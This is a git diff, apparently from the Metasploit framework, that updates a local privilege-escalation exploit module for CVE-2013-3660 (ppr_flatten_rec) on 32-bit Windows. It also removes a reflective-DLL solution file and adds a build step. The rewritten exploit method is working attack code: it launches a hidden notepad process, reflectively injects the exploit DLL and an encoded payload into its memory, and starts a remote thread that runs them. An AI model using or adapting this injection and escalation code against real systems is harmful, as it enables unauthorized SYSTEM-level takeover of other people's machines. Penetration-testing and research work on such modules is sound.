diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
deleted file mode 100755
index 0a0dde7c06..0000000000
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual C++ Express 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index 2acf81084f..808969ad80 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
+IF "%ERRORLEVEL%"=="0" (
+ ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
+ PUSHD CVE-2013-3660
+ msbuild.exe make.msbuild /target:%PLAT%
+ POPD
+)
+
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 47bc4c96da..41a33cc523 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Local
[
'Tavis Ormandy ', # Vulnerability discovery and Original Exploit
'progmboy ', # Original Exploit
- 'Keebie4e', # Metasploit integration
- 'egypt', # Metasploit integration
- 'sinn3r', # Metasploit integration
- 'Meatballs', # Metasploit integration
- 'juan vazquez' # Metasploit integration
+ 'Keebie4e', # Metasploit integration
+ 'egypt', # Metasploit integration
+ 'sinn3r', # Metasploit integration
+ 'Meatballs', # Metasploit integration
+ 'juan vazquez', # Metasploit integration
+ 'OJ Reeves' # Metasploit integration
],
'Arch' => ARCH_X86,
'Platform' => 'win',
@@ -54,12 +55,17 @@ class Metasploit3 < Msf::Exploit::Local
[ 'CVE', '2013-3660' ],
[ 'EDB', '25912' ],
[ 'OSVDB', '93539' ],
+ [ 'MSB', 'MS13-015' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
],
'DisclosureDate' => 'May 15 2013',
'DefaultTarget' => 0
}))
+ register_options([
+ OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 10 ])
+ ], self.class)
+
end
def check
@@ -110,6 +116,13 @@ class Metasploit3 < Msf::Exploit::Local
end
def exploit
+ if is_system?
+ fail_with(Exploit::Failure::None, 'Session is already elevated')
+ end
+
+ if check == Exploit::CheckCode::Safe
+ fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+ end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
@@ -117,56 +130,59 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
- print_status("Creating a new process and migrating...")
+ dll = ''
+ offset = nil
- cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
- new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
- new_pid = new_proc.pid
+ print_status("Launching notepad to host the exploit...")
+ cmd = "notepad.exe"
+ opts = {'Hidden' => true}
+ process = client.sys.process.execute(cmd, nil, opts)
+ pid = process.pid
+ host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{pid} launched.")
- if not new_pid
- print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
- else
- print_status("Migrating to #{new_pid}")
- migrate_res = false
-
- begin
- migrate_res = session.core.migrate(new_pid)
- rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
- migrate_res = false
- end
-
- if migrate_res
- print_good("Successfully migrated to process #{new_pid}")
- else
- print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
+ print_status("Reflectively injecting the exploit DLL into #{pid}...")
+ library_path = ::File.join(Msf::Config.data_directory, "exploits",
+ "cve-2013-3660", "ppr_flatten_rec.x86.dll")
+ library_path = ::File.expand_path(library_path)
+ ::File.open(library_path, 'rb') { |f| dll = f.read }
+ pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
+ pe.exports.entries.each do |e|
+ if e.name =~ /^\S*ReflectiveLoader\S*/
+ offset = pe.rva_to_file_offset(e.rva)
+ break
end
end
+ # Inject the exloit, but don't run it yet.
+ exploit_mem = inject_into_pid(dll, host_process)
- print_status("Trying to load the exploit and executing...")
+ print_status("Exploit injected. Injecting payload into #{pid}...")
+ # Inject the payload into the process so that it's runnable by the exploit.
+ payload_mem = inject_into_pid(payload.encoded, host_process)
- session.core.load_library({
- "LibraryFilePath" => File.join(Msf::Config.data_directory, "exploits", "cve-2013-3660", "exploit.dll"),
- "UploadLibrary" => true,
- "Extension" => false,
- "TargetFilePath" => "#{rand_text_alpha(5 + rand(3))}.dll",
- "SaveToDisk" => false
- })
-
- print_status("Checking privileges after exploitation...")
-
- if is_system?
- print_good("Exploitation successful!")
- else
- fail_with(Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
- end
-
- if execute_shellcode(payload.encoded)
- print_good("Enjoy!")
- else
- fail_with(Failure::Unknown, "Error while executing the payload")
- end
+ print_status("Payload injected. Executing exploit...")
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ host_process.thread.create(exploit_mem + offset, payload_mem)
+ wait = datastore['WAIT'].to_i
+ print_status("Exploit thread executing (can take a while to run), waiting #{wait} sec ...")
+ # TODO: talk to the guys about this, there has to be a wait involved before the
+ # exploit has finished, because the listener has to stick around for a while
+ # otherwise it shuts down before the exploit has finished.
+ Rex.sleep(wait)
+ print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
+protected
+
+ def inject_into_pid(payload, process)
+ payload_size = payload.length
+ payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
+ payload_mem = process.memory.allocate(payload_size)
+ process.memory.protect(payload_mem)
+ process.memory.write(payload_mem, payload)
+ return payload_mem
+ end
end